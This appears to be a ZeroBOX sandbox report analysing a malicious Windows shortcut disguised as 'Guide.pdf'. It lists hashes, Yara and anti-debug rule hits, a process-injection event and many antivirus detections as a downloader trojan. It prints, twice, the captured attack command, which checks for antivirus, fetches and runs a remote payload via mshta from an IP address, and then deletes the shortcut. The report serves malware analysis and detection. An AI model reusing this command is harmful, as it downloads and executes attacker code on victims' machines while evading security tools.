popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Guide.pdf.lnk

Generic Malware AntiVM Lnk Format AntiDebug GIF Format
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 July 31, 2024, 9:34 a.m. July 31, 2024, 9:37 a.m.
Size 15.2KB
Type MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=13, Archive, ctime=Fri May 6 20:20:19 2022, mtime=Fri Jul 26 00:24:11 2024, atime=Fri May 6 20:20:19 2022, length=41472, window=hidenormalshowminimized
MD5 0e5138203d1ba9f34206bdde51374198
SHA256 95302ad9f4452d0ac02d3c364517ee72ecb3cc718c6926cb5c05f6955ec2b8e8
CRC32 C745EAB9
ssdeep 24:85K0V0+9u6ppyAgkg+/431cI1tMwcwm1B+8PxKqe15ZK1wYQOddqVnvr9doab5Mc:8Qr+9VRy1zMKIB7wqaczd0hvr9uals
Yara
  • lnk_file_format - Microsoft Windows Shortcut File Format
  • Lnk_Format_Zero - LNK Format
  • Generic_Malware_Zero - Generic Malware

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: ERROR: Invalid argument/option - '$R'. Type "FORFILES /?" for usage.
console_handle: 0x0000000b
1 1 0
file C:\Users\test22\AppData\Local\Temp\Guide.pdf.lnk
cmdline "C:\Windows\System32\forfiles.exe" $R = Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct -ComputerName $env:computername;foreach($T in $R ){if ($T.displayName -replace 'Windows Defender', ''){Exit}}/p C:\Windows\System32 /m calc.exe /c "powershell . mshta http://141.98.234.166/Yotsuba";$GhUV = Get-Location;$GhUV = Join-Path $GhUV 'Guide.pdf.lnk';del $GhUV
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Windows\System32\forfiles.exe" $R = Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct -ComputerName $env:computername;foreach($T in $R ){if ($T.displayName -replace 'Windows Defender', ''){Exit}}/p C:\Windows\System32 /m calc.exe /c "powershell . mshta http://141.98.234.166/Yotsuba";$GhUV = Get-Location;$GhUV = Join-Path $GhUV 'Guide.pdf.lnk';del $GhUV
Process injection Process 3016 resumed a thread in remote process 2216
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000334
suspend_count: 1
process_identifier: 2216
1 0 0
Malwarebytes Trojan.Downloader.Generic
VIPRE Heur.BZC.YAX.Pantera.47.5F1CFF92
Arcabit Heur.BZC.YAX.Pantera.47.5F1CFF92
Symantec CL.Downloader!gen111
Avast LNK:Agent-EJ [Trj]
Kaspersky HEUR:Trojan.Multi.Agent.gen
BitDefender Heur.BZC.YAX.Pantera.47.5F1CFF92
MicroWorld-eScan Heur.BZC.YAX.Pantera.47.5F1CFF92
Rising Downloader.Mshta/LNK!1.BADA (CLASSIC)
Emsisoft Heur.BZC.YAX.Pantera.47.5F1CFF92 (B)
F-Secure Trojan:W32/LnkGen.C
FireEye Heur.BZC.YAX.Pantera.47.5F1CFF92
Sophos Troj/DownLnk-X
SentinelOne Static AI - Suspicious LNK
Google Detected
MAX malware (ai score=85)
Microsoft Trojan:Win32/WinLNK.HNE!MTB
ZoneAlarm HEUR:Trojan.Multi.Agent.gen
GData Heur.BZC.YAX.Pantera.47.5F1CFF92
AhnLab-V3 LNK/Autorun.Gen
huorong TrojanDownloader/LNK.Agent.da
AVG LNK:Agent-EJ [Trj]